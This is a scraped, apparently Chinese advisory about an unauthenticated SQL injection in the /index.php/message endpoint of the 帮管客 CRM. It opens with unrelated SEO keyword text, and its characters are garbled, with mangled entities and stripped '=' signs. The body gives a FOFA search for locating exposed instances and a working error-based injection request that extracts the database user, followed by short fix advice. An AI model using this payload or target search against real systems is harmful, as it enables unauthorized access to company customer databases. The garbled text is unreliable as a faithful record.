php 网站建设 教学,青岛市建设局网站,WordPress 聊天小工具,wordpress新闻站0x01 产品简介 帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统#xff0c;客户管理#xff0c;从未如此简单#xff0c;一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化数据分析帮管客颠覆传…0x01 产品简介 帮管客CRM是一款集客户档案、销售记录、业务往来等功能于一体的客户管理系统。帮管客CRM客户管理系统客户管理从未如此简单一个平台满足企业全方位的销售跟进、智能化服务管理、高效的沟通协同、图表化数据分析帮管客颠覆传统重新定义企业管理系统。
0x02 漏洞概述 帮管客CRM 客户管理系统/index.php/message 接口存在 sql 注入漏洞未经身份认证的攻击者可通过此漏洞获取数据库敏感信息。
0x03 复现环境
FOFAapp帮管客-CRM 0x04 漏洞复现
PoC
GET /index.php/message?page1pai1%20and%20extractvalue(0x7e,concat(0x7e,(selectuser%28%29),0x7e))%23xudesc HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
查询当前用户
0x05 修复建议
官方已发布安全版本请用户联系厂商修复漏洞https://www.bgk100.com/
部署Web应用防火墙对数据库操作进行监控。
如非必要禁止公网访问该系统。
